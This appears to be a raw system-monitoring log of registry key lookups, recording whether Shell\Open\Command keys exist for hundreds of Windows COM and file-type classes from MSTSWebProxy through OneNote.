Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTSWebProxy.MSTSWebProxy.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSCommon.LTS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSCommon.LTS.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSDecWrp.DecObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSDecWrp.DecObj.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSEngine.TTSEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSEngine.TTSEngine.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSFrontendENU.MSTTSFrontendENU\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTTSFrontendENU.MSTTSFrontendENU.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.EVR\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.EVR.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSEventBinder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSEventBinder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAnalogTunerDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAnalogTunerDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRenderer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRenderer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRendererDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidAudioRendererDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidBDATunerDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidBDATunerDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCCA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCCA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioning\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioning.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioningSI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidClosedCaptioningSI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidEncoder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidEncoder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFeatures\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFeatures.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFilePlaybackDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidFilePlaybackDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidGenericSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidGenericSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidInputDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidInputDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVCapture\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVCapture.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVPlayback\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidITVPlayback.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidOutputDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidOutputDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferRecordingControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferRecordingControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSource\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferSource.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferV2Source\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidStreamBufferV2Source.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRenderer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRenderer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRendererDevices\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVideoRendererDevices.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVMR9\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidVMR9.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVD.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVDAdm\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSVidCtl.MSVidWebDVDAdm.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSXML.DOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSXML.FreeThreadedDOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DOMDocument.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DSOControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.DSOControl.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.FreeThreadedDOMDocument.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXHTMLWriter.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXNamespaceManager.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.MXXMLWriter.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXAttributes.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.SAXXMLReader.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.ServerXMLHTTP.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLHTTP.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLParser.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XMLSchemaCache.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate.3.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msxml2.XSLTemplate.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Mts.MtsGrp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTSAdmin.Catalog\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTSAdmin.Catalog.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxAS.AppServer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxSpm.SharedPropertyGroupManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MTxSpm.SharedPropertyGroupManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Name.NameCtrl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Name.NameCtrl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameControlServer.NameCtrl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameControlServer.NameCtrl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NameTranslate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbBaseDoc.NbBaseDocEdit\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbBaseDoc.NbBaseDocEdit.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.NBDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.NBDocument.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.Stationery\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Nbdoc.Stationery.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocCstg.NbDocCstg\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocCstg.NbDocCstg.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbAccessibleObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbAccessibleObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbDocView\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbDocView.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbRioEventSink\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbDocViewer.NbRioEventSink.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbBitmapLayer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbBitmapLayer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbCompositeLayer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbImage.NbCompositeLayer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPage\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPage.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageProp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageProp.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageText\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NbTextLayout.NbTextLayoutPageText.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCPjcal.PjCalendar3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCProv.NCProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NCProv.NCProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NDFAPI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NDFAPI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NetworkDiagnostics\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ndfapi.NetworkDiagnostics.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\netcenter.NCLUA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\netcenter.NCLUA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetProjW.Elev\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetProjW.Elev.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetServer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Network\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetworkConnections\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NetworkExplorerPlugins\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\new\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.AppEventsDHTMLConnector\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.AppEventsDHTMLConnector.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ComCacheCleanup\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ComCacheCleanup.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCDocConfig\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCDocConfig.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCProtocol\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCProtocol.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCVersionInfo\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCVersionInfo.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCViewExt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.MMCViewExt.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.NodeInitObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.NodeInitObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ScopeTreeObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NODEMGR.ScopeTreeObject.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NumericResourceTable.NumericResourceTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\NumericTaskTable.NumericTaskTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilterCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Object.Microsoft.DXTFilterCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\objref\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OCHelper.BrowserHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OCHelper.BrowserHelper.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.FormRegionContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.OcForms\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OcOffice.OneNoteHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ocxfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ODBC.FileDSN\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.cube\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.database\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.new\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.table\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odc.tablecollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odccubefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odcdatabasefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ODCfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odcnewfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odctablecollectionfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odctablefile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\odtfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.awsdc\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.awsdc.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.LocalSyncClient\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.LocalSyncClient.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Query\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.QueryConstraints\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.QueryConstraintsBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Row\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.Session\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Office.StorageServer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeCompatible.Application.x64\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeCompatible.Application.x86\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeListShortcut\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficePriv.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeTheme\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OfficeTheme.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OldFont\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Row Proxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Row Server\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Rowset Proxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLE DB Rowset Server\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.AspHelp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.AspHelp.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.DSPrintQueue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.DSPrintQueue.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleCvt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleCvt.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleInstall\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleInstall.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleSNMP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.OleSNMP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.PrinterURL\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OlePrn.PrinterURL.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OLETransactionManagers\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\omicaut.MathInputControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\oms\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex.ShellFolder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex.ShellFolder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.12\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.14\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.CFileConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Folder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Folder.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.12\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.LinkedNotes\Shell\Open\Command - False 1
Fn
